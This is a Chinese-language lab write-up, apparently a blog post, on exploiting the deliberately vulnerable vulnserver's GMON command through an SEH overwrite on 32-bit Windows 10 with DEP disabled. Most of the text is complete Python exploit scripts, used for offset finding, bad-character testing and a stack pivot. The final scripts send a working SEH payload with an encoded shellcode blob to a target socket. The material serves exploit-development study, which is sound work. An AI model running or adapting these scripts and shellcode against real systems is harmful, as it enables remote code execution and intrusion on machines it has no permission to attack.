本次实验讨论在Win10 21h2 x86系统下关闭DEP,利用SEH完成。
节省时间,FUZZ就不做了。直接改之前TRUN部分FUZZ代码即可。
来看一下vulnserver崩溃时寄存器的情况。
注意看,SEH链被覆盖了。所以这里可能存在基于SEH的利用。接下来确定具体的offset。这里利用msf-pattern_offset生成5000的字符。继续测试可以得到如下:
注意标红的字符串346f4533,查找其在生成的随机字符串中的位置,获取具体的偏移量为3547:
或者,直接在windbg中也可以:
1 2 3 4 5 6 # .load pykd.pyd # !py mona pattern_create 5000 # !py mona pattern_offset 346f4533
可以知道,3551 个字符可以覆盖SEH Handler,3547 个字符可以覆盖Next SEH。(参照SEH结构,Next SEH在SEH Handler前面)
查找P/P/R。
具体的内容,可以查看生成的seh.txt文件。可能windbg的权限不够,导致seh.txt文件创建失败。
注意: 选择的P/P/R所在DLL应该SafeSEH为False。
这里选择essfunc.dll中0x625010b4所在地址的P/P/R。
理论上0x625010b4就可以让eip指向shellcode的开始部分,触发shellcode。但是实际上跳转完成之后,后续中间可能存在脏字符,需要根据实际情况进行调整。如本例。用\xcc\xcc\xcc\xcc中断程序执行,来看一下栈上的数据的情况。结合之前SEH利用,JMP的时候至少要跳过6byte,实际上是JMP SHORT 0x08或者JMP $+0x08。(因为JMP指令会占2byte,所以后面的偏移为0x08)
当前使用的利用脚本如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 import socketHOST = '192.168.13.186' PORT = 9999 junk = b"A" *3547 nseh = b"\xcc\xcc\xcc\xcc" seh = b"\xb4\x10\x50\x62" nops = b"" shellcode = b"D" *(5000 -3547 -4 -4 ) PAYLOAD = ( b'GMON /.:/' + junk + nseh + seh + nops + shellcode ) with socket.create_connection((HOST, PORT)) as fd: fd.sendall(PAYLOAD)
看一下异常现场:
继续跟进看一下,windbg中EIP所指向栈空间数据如下:
发现这里中间没有出现\x00,所以shellcode之前不一定需要插入一段\x90,不过为了防止出现意外情况,一般插入一段\x90比较好。看上面dump出来的信息,发现还有一个比较有意思的点,我们填充的\x44只覆盖了一部分栈空间,后续在这里写入shellcode是不可行的,因为空间不够,所以上面介绍的跳转方式已经不能使用了,需要换其他方式,可以使用egghunter技术或者使用stack pivot技术。
在使用stack pivot技术的时候,我把shellcode放在了A字符串的最开始部分,这样会导致shellcode执行失败,调试发现在shellcode执行完部分指令之后,栈空间会变成类似如下所示:
注意标红的部分,此时栈空间出现了00导致会被截断。正确的方式是shellcode放在A字符串中间,在最终的利用代码里可以更加明确的理解这一点。
来确定一下坏字符,使用的代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 import socketHOST = '192.168.13.186' PORT = 9999 badchars=b"" badchars+=b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" badchars+=b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" badchars+=b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" badchars+=b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" badchars+=b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" badchars+=b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" badchars+=b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" badchars+=b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" badchars+=b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" badchars+=b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" badchars+=b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" badchars+=b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" badchars+=b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" badchars+=b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" badchars+=b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" badchars+=b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" junk = b"A" *(3547 -len(badchars)) nseh = b"\xcc\xcc\xcc\xcc" seh = b"\xb4\x10\x50\x62" nops = b"" shellcode = b"D" *(5000 -3547 -4 -4 -len(badchars)) PAYLOAD = ( b'GMON /.:/' + badchars + junk + nseh + seh + nops + shellcode ) with socket.create_connection((HOST, PORT)) as fd: fd.sendall(PAYLOAD)
可以发现,坏字符仅为\x00。
其实,仔细分析,发现不用上面那么麻烦,按照正常的来,寻找坏字符的代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 import socketHOST = '192.168.13.191' PORT = 9999 badchars=b"" badchars+=b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" badchars+=b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" badchars+=b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" badchars+=b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" badchars+=b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" badchars+=b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" badchars+=b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" badchars+=b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" badchars+=b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" badchars+=b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" badchars+=b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" badchars+=b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" badchars+=b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" badchars+=b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" badchars+=b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" badchars+=b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" junk = b"A" *3547 nseh = b"\xcc\xcc\xcc\xcc" seh = b"\xb4\x10\x50\x62" nops = b"" others = b"D" *(5000 -3547 -4 -4 -len(badchars)) PAYLOAD = ( b'GMON /.:/' + junk + nseh + seh + nops + badchars + others ) with socket.create_connection((HOST, PORT)) as fd: fd.sendall(PAYLOAD)
来看一下windbg中此刻的内存情况:
发现ecx-0x30正好指向坏字符,而且发现除了截断字符\x00,没有其他坏字符。
先来看stack pivot,构造思路:常规SEH利用,最后跳到handler之后的空间执行shellcode,现在在这个空间放置一个跳转指令,让它跳转到最开始A字符串中shellcode所在的位置,可以根据其距离ESP的距离来进行构造指令。先看最终的利用代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 import socketHOST = '192.168.13.191' PORT = 9999 shellcode = b"" shellcode += b"\xd9\xe9\xbd\x7c\xf8\xfd\xa2\xd9\x74\x24\xf4" shellcode += b"\x58\x31\xc9\xb1\x52\x31\x68\x17\x03\x68\x17" shellcode += b"\x83\x94\x04\x1f\x57\x98\x1d\x62\x98\x60\xde" shellcode += b"\x03\x10\x85\xef\x03\x46\xce\x40\xb4\x0c\x82" shellcode += b"\x6c\x3f\x40\x36\xe6\x4d\x4d\x39\x4f\xfb\xab" shellcode += b"\x74\x50\x50\x8f\x17\xd2\xab\xdc\xf7\xeb\x63" shellcode += b"\x11\xf6\x2c\x99\xd8\xaa\xe5\xd5\x4f\x5a\x81" shellcode += b"\xa0\x53\xd1\xd9\x25\xd4\x06\xa9\x44\xf5\x99" shellcode += b"\xa1\x1e\xd5\x18\x65\x2b\x5c\x02\x6a\x16\x16" shellcode += b"\xb9\x58\xec\xa9\x6b\x91\x0d\x05\x52\x1d\xfc" shellcode += b"\x57\x93\x9a\x1f\x22\xed\xd8\xa2\x35\x2a\xa2" shellcode += b"\x78\xb3\xa8\x04\x0a\x63\x14\xb4\xdf\xf2\xdf" shellcode += b"\xba\x94\x71\x87\xde\x2b\x55\xbc\xdb\xa0\x58" shellcode += b"\x12\x6a\xf2\x7e\xb6\x36\xa0\x1f\xef\x92\x07" shellcode += b"\x1f\xef\x7c\xf7\x85\x64\x90\xec\xb7\x27\xfd" shellcode += b"\xc1\xf5\xd7\xfd\x4d\x8d\xa4\xcf\xd2\x25\x22" shellcode += b"\x7c\x9a\xe3\xb5\x83\xb1\x54\x29\x7a\x3a\xa5" shellcode += b"\x60\xb9\x6e\xf5\x1a\x68\x0f\x9e\xda\x95\xda" shellcode += b"\x31\x8a\x39\xb5\xf1\x7a\xfa\x65\x9a\x90\xf5" shellcode += b"\x5a\xba\x9b\xdf\xf2\x51\x66\x88\x3c\x0d\x65" shellcode += b"\xc1\xd5\x4c\x75\xc0\x79\xd8\x93\x88\x91\x8c" shellcode += b"\x0c\x25\x0b\x95\xc6\xd4\xd4\x03\xa3\xd7\x5f" shellcode += b"\xa0\x54\x99\x97\xcd\x46\x4e\x58\x98\x34\xd9" shellcode += b"\x67\x36\x50\x85\xfa\xdd\xa0\xc0\xe6\x49\xf7" shellcode += b"\x85\xd9\x83\x9d\x3b\x43\x3a\x83\xc1\x15\x05" shellcode += b"\x07\x1e\xe6\x88\x86\xd3\x52\xaf\x98\x2d\x5a" shellcode += b"\xeb\xcc\xe1\x0d\xa5\xba\x47\xe4\x07\x14\x1e" shellcode += b"\x5b\xce\xf0\xe7\x97\xd1\x86\xe7\xfd\xa7\x66" shellcode += b"\x59\xa8\xf1\x99\x56\x3c\xf6\xe2\x8a\xdc\xf9" shellcode += b"\x39\x0f\xfc\x1b\xeb\x7a\x95\x85\x7e\xc7\xf8" shellcode += b"\x35\x55\x04\x05\xb6\x5f\xf5\xf2\xa6\x2a\xf0" shellcode += b"\xbf\x60\xc7\x88\xd0\x04\xe7\x3f\xd0\x0c" junk = b"A" *(3547 -len(shellcode)-32 ) nseh = b"\xeb\x06\x90\x90" seh = b"\xb4\x10\x50\x62" nops = b"\x90" *32 stage = b'\x66\x81\xC4\xC0\x11' stage += b'\xff\xe4' others = b"C" *(5000 -3547 -4 -4 -len(stage)-32 ) PAYLOAD = ( b'GMON /.:/' + junk + nops + shellcode+ nseh + seh + nops + stage + others ) with socket.create_connection((HOST, PORT)) as fd: fd.sendall(PAYLOAD)
介绍mona里面一个有用的命令:
会自动在SEH Handler地址处加上断点,方便调试。免得自己先!exchain,然后手动bp了。
继续执行,会中断在P/P/R所在指令:
JMP指令指向之前,看windbg中内存情况:
搜索一下栈空间,看我们shellcode在哪里:
看一下该地址与ESP之间的偏移,因为我们在shellcode之前增加了32个\x90,所以要减掉32byte。
这里有个诡异的地方,最后如果使用add esp, 0x11c1的话,shellcode会执行不成功。虽然JMP ESP跳转到NOP指令,shellcode也是执行不成功的。这种方式有点不稳定。换一种方式。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 import socketHOST = '192.168.13.194' PORT = 9999 offset = b'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1E' nseh = b"\xeb\x06\x90\x90" seh = b"\xb4\x10\x50\x62" nops = b"" shellcode = b"D" *(5000 -3547 -4 -4 ) PAYLOAD = ( b'GMON /.:/' + offset + nseh + seh + nops + shellcode ) with socket.create_connection((HOST, PORT)) as fd: fd.sendall(PAYLOAD)
注意这里的offset字符串,生成的命令为:
在windbg里面继续执行到跳转指令之前,看一下windbg的内存情况:
接着运行如下命令:
stack pivot有好几个备选项。这里选择离ESP最近的,且是跳转到[ESP],完整的代码实现:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 import socketHOST = '192.168.13.194' PORT = 9999 shellcode = b"" shellcode += b"\xd9\xe9\xbd\x7c\xf8\xfd\xa2\xd9\x74\x24\xf4" shellcode += b"\x58\x31\xc9\xb1\x52\x31\x68\x17\x03\x68\x17" shellcode += b"\x83\x94\x04\x1f\x57\x98\x1d\x62\x98\x60\xde" shellcode += b"\x03\x10\x85\xef\x03\x46\xce\x40\xb4\x0c\x82" shellcode += b"\x6c\x3f\x40\x36\xe6\x4d\x4d\x39\x4f\xfb\xab" shellcode += b"\x74\x50\x50\x8f\x17\xd2\xab\xdc\xf7\xeb\x63" shellcode += b"\x11\xf6\x2c\x99\xd8\xaa\xe5\xd5\x4f\x5a\x81" shellcode += b"\xa0\x53\xd1\xd9\x25\xd4\x06\xa9\x44\xf5\x99" shellcode += b"\xa1\x1e\xd5\x18\x65\x2b\x5c\x02\x6a\x16\x16" shellcode += b"\xb9\x58\xec\xa9\x6b\x91\x0d\x05\x52\x1d\xfc" shellcode += b"\x57\x93\x9a\x1f\x22\xed\xd8\xa2\x35\x2a\xa2" shellcode += b"\x78\xb3\xa8\x04\x0a\x63\x14\xb4\xdf\xf2\xdf" shellcode += b"\xba\x94\x71\x87\xde\x2b\x55\xbc\xdb\xa0\x58" shellcode += b"\x12\x6a\xf2\x7e\xb6\x36\xa0\x1f\xef\x92\x07" shellcode += b"\x1f\xef\x7c\xf7\x85\x64\x90\xec\xb7\x27\xfd" shellcode += b"\xc1\xf5\xd7\xfd\x4d\x8d\xa4\xcf\xd2\x25\x22" shellcode += b"\x7c\x9a\xe3\xb5\x83\xb1\x54\x29\x7a\x3a\xa5" shellcode += b"\x60\xb9\x6e\xf5\x1a\x68\x0f\x9e\xda\x95\xda" shellcode += b"\x31\x8a\x39\xb5\xf1\x7a\xfa\x65\x9a\x90\xf5" shellcode += b"\x5a\xba\x9b\xdf\xf2\x51\x66\x88\x3c\x0d\x65" shellcode += b"\xc1\xd5\x4c\x75\xc0\x79\xd8\x93\x88\x91\x8c" shellcode += b"\x0c\x25\x0b\x95\xc6\xd4\xd4\x03\xa3\xd7\x5f" shellcode += b"\xa0\x54\x99\x97\xcd\x46\x4e\x58\x98\x34\xd9" shellcode += b"\x67\x36\x50\x85\xfa\xdd\xa0\xc0\xe6\x49\xf7" shellcode += b"\x85\xd9\x83\x9d\x3b\x43\x3a\x83\xc1\x15\x05" shellcode += b"\x07\x1e\xe6\x88\x86\xd3\x52\xaf\x98\x2d\x5a" shellcode += b"\xeb\xcc\xe1\x0d\xa5\xba\x47\xe4\x07\x14\x1e" shellcode += b"\x5b\xce\xf0\xe7\x97\xd1\x86\xe7\xfd\xa7\x66" shellcode += b"\x59\xa8\xf1\x99\x56\x3c\xf6\xe2\x8a\xdc\xf9" shellcode += b"\x39\x0f\xfc\x1b\xeb\x7a\x95\x85\x7e\xc7\xf8" shellcode += b"\x35\x55\x04\x05\xb6\x5f\xf5\xf2\xa6\x2a\xf0" shellcode += b"\xbf\x60\xc7\x88\xd0\x04\xe7\x3f\xd0\x0c" junk1 = b"A" *1999 junk2 = b"B" *(3547 -1999 -len(shellcode)) nseh = b"\xeb\x06\x90\x90" seh = b"\xb4\x10\x50\x62" nops = b"\x90" *32 stage = b'\x83\xC4\x7F' stage += b'\x83\xC4\x5D' stage += b'\xFF\x24\x24' others = b"C" *(5000 -3547 -4 -4 -len(stage)-32 ) PAYLOAD = ( b'GMON /.:/' + junk1 + shellcode+ junk2+ nseh + seh + nops + stage + others ) with socket.create_connection((HOST, PORT)) as fd: fd.sendall(PAYLOAD)
注意看,没有使用add esp,0xdc,因为机器码带有00,会截断:
所以,需要将0xdc分两次加,每次要加的数不能超过0x80,原因:https://en.wikipedia.org/wiki/Signed_number_representations
最终:
总结:推荐使用后一种方式,最后参考部分,有的文章直接远处跳转到shellcode地址,这个似乎有问题,至少在我这里每次shellcode地址不太一样。但是距离ESP的偏移是一样的。
参考:
1.https://epi052.gitlab.io/notes-to-self/blog/2020-05-19-osce-exam-practice-part-four/
2.https://fluidattacks.com/blog/vulnserver-gmon/
3.https://dunderhay.github.io/2019/02/07/gmon.html
4.https://dunderhay.github.io/2019/02/07/gmon.html
